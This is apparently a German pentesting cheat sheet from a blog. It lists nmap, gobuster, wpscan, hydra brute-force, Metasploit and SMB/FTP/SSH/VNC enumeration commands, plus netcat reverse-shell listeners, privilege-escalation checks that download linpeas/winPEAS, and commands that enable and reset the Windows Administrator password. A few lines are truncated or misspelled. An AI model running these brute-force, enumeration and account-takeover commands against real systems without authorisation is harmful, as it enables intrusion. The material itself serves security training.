Bild generiert mit OpenAI's DALL-E über ChatGPT, erstellt am 20.06.2024
Einfacher Scan: nmap <IP-Adresse>
Alle Ports: nmap -p- <IP-Adresse
Spezifischer Port nmap -p 80 <IP-Adresse>
Service und Versionserkennung: nmap -sV <IP-Adresse>
Betriebssystemerkennung: nmap -O <IP-Adresse>
Aggressiver Scan: nmap -A <IP-Adresse>
Skript-Scan mit Standard-Skripten: nmap -sC <IP-Adresse>
Langsamster Scan: nmap -T0 <IP-Adresse>
Langsamer Scan: nmap -T1 <IP-Adresse>
Standard Geschwindigkeit: nmap -T3 <IP-Adresse>
Schneller Scan: nmap -T4 <IP-Adresse>
Schnellster Scan: nmap -T5 <IP-Adresse>
Scannen von mehreren Hosts: nmap <IP-Adresse1> <IP-Adresse2>
Scannen eines IP-Bereichs: nmap <IP-Adresse1-IP-Adresse2>
Speichern der Ausgabe in einer Datei: nmap -oN <Dateiname> <IP-Adresse>
Scan mit bestimmten Skripten: nmap --script <Skriptname> <IP-Adresse>
SYN-Scan: nmap -sS <IP-Adresse>
UPD-Scan: nmap -sU <IP-Adresse>
Kombinierter TCP und UDP Scan: nmap -sS -sU <IP-Adresse>
Volles Netzwerk-Scan: nmap -sn <IP-Adresse>
Ping-Scan: nmap -sP <IP-Adresse>
Verzeichnissan mit spezifischer Wordlist: gobuster dir -u <URL> -w <Wordlist>
Verzeichnissan mit Standard-Wordlist: gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
Verzeichnissan mit Dateiendungen: gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt -x <Dateiendungen>
Beispiel: gobuster dir -u http://192.168.0.155/ -w /usr/share/wordlists/dirb/common.txt
Ziel scannen: wpscan --url <URL>
Aggressiver Plugin Scan: wpscan --url <URL> --plugins-detection aggressive
Benutzer auflisten: wpscan --url <URL> --enumerate u
Alle Plugins auflisten: wpscan --url <URL> --enumerate p
Verwundbare Plugins auflisten: wpscan --url <URL> --enumerate vp
Alle Themes auflisten: wpscan --url <URL> --enumerate t
Verwundbare Themes auflisten: wpscan --url <URL> --enumerate vt
Passwortangriff: wpscan --url <URL> --passwords <Wordlist> --usernames <Benutzer>
Passwortangriff mit spezifischem Benutzer: wpscan --url <URL> --passwords <Wordlist> --username <Benutzer>
Beispiel: wpscan --url http://derpnstink.local/weblog
Beispiel: wpscan --url http://playground.cyberpunk.rs:81 --enumerate vp --plugins-detection aggressive
Grundlegender Scan (Benutzername Liste): hydra -L <Benutzerliste> -P <Passwortliste> <Ziel-IP> <Dienst> -V
Grundlegender Scan (Benutzername): hydra -l <Benutzername> -P <Passwortliste> <Ziel-IP> <Dienst> -V
FTP: hydra -L users.txt -P passwords.txt ftp://<Ziel-IP>
SSH: hydra -L users.txt -P passwords.txt ssh://<Ziel-IP>
Telnet: hydra -L users.txt -P passwords.txt telnet://<Ziel-IP>
HTTP-GET: hydra -L users.txt -P passwords.txt <Ziel-IP> http-get /login.php
HTTP-POST: hydra -L users.txt -P passwords.txt <Ziel-IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:F=failed"
MYSQL: hydra -L users.txt -P passwords.txt mysql://<Ziel-IP>
RDP: hydra -L users.txt -P passwords.txt rdp://<Ziel-IP>
SMB: hydra -L <Benutzerliste> -P <Passwortliste> smb://<Ziel-IP>
Spezifischer Port: hydra -L users.txt -P passwords.txt <Ziel-IP> -s <Port> <Dienst>
Proxy verwenden: hydra -L users.txt -P passwords.txt <Ziel-IP> <Dienst> -o <Datei> -x <Proxy>
Ergebnisdatei angeben: hydra -L users.txt -P passwords.txt <Ziel-IP> <Dienst> -o <Datei>
Konsole starten: msfconsole
Suchen nach Modulen: search <Suchbegriff>
Modul auswählen: use <Modulname>
Modul anzeigen: show options
Optionen setzen: set <Option> <Wert>
Modul ausführen: run
Informationen sammeln: nmap -p 445 --script smb-os-discovery <Ziel-IP>
Smbclient: smbclient -L //<Ziel-IP> -U anonymous
Enum4linux: enum4linux -a <Ziel-IP>
Spezifische Freigabe: smbclient //<Ziel-IP>/<Freigabe> -U <Benutzername>
Kein Benutzername erforderlich: smbclient //<Ziel-IP>/<Freigabe> -N
Daten herunterladen: smbclient //<Ziel-IP>/<Freigabe> -U <Benutzername> -c 'get <Dateiname>'
SMB-Version scannen: use auxiliary/scanner/smb/smb_version
set RHOSTS <Ziel-IP>
run
Freigaben auflisten:
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS <Ziel-IP>
run
Benutzer auflisten: use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <Ziel-IP>
run
hydra: hydra -L users.txt -P passwords.txt smb://<Ziel-IP>
EternalBlue (MS17-010) Scannen: nmap --script smb-vuln-ms17-010 -p 445 <Ziel-IP>
Mounten von Freigaben: ```mount -t cifs /// /mnt/ -o user
VNC Version Erkennung: nmap -sV --script vnc-info <Ziel-IP> -p 5900
hydra Brut Force: hydra -s 5900 -P passwords.txt <Ziel-IP> vnc
Metasploit: use auxiliary/scanner/vnc/vnc_login
set RHOSTS <Ziel-IP>
run
Anonymer Zugriff: ftp <Ziel-IP>
Anonymen Zugriff prüfen: nmap --script ftp-anon <Ziel-IP>
hydra Brut Force: hydra -L users.txt -P passwords.txt ftp://<Ziel-IP>
MetaSploit: use auxiliary/scanner/ftp/ftp_login
set RHOSTS <Ziel-IP>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
hydra Brut Force: hydra -L users.txt -P passwords.txt ssh://<Ziel-IP>
Verbindung zu ssh Client herstellen: ssh <Benutzername>@<Ziel-IP>
Mit spezifischen Port: ssh -p <Port> <Benutzername>@<Ziel-IP>
Schlüsselbasierte Authentifizierung: ssh -i <Pfad-zum-Schlüssel> <Benutzername>@<Ziel-IP>
MetaSploit: use auxiliary/scanner/ssh/ssh_login
set RHOSTS <Ziel-IP>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
Revshells: https://www.revshells.com/
Listenser: nc -lvnp <Port>
Listener mit rlwrap: rlwrap nc -lvnp <Port>
-di
SUID-Binaries: find / -perm -u=s -type f 2>/dev/null
Sudo Rechte: sudo -l
Cron Jobs anschauen: cat /etc/contab
crontab -l
ls -la /etc/cron*
PrivescCheck: https://github.com/itm4n/PrivescCheck https://github.com/itm4n/PrivescCheck/blob/master/PrivescCheck.ps1
Windows_privesc: https://gist.github.com/sckalath/8dacd032b65404ef7411
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
wget https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat -O winPEAS.bat
./winPEAS.bat
gzip -d rockyou.txt.gz
python -m http.server 9000
python3 -c 'import pty; pty.spawn("/bin/bash")'
STRG-Z
stty -a
stty raw -echo; fg
stty rows <num> columns <num>
export TERM=xterm
rdesktop -u <Benutzername> -p <Passwort> <IP-Adresse>
xfreerdp /v:<IP-Adresse> /u:<Benutzername> /p:<Passwort>
bei meterpreter Shell : execute -f cmd.exe -i -t
net user Administrator /active:yes
net user Administrator <neues_passwort>
echo "STRING" | base64 -d
chmod 0400 key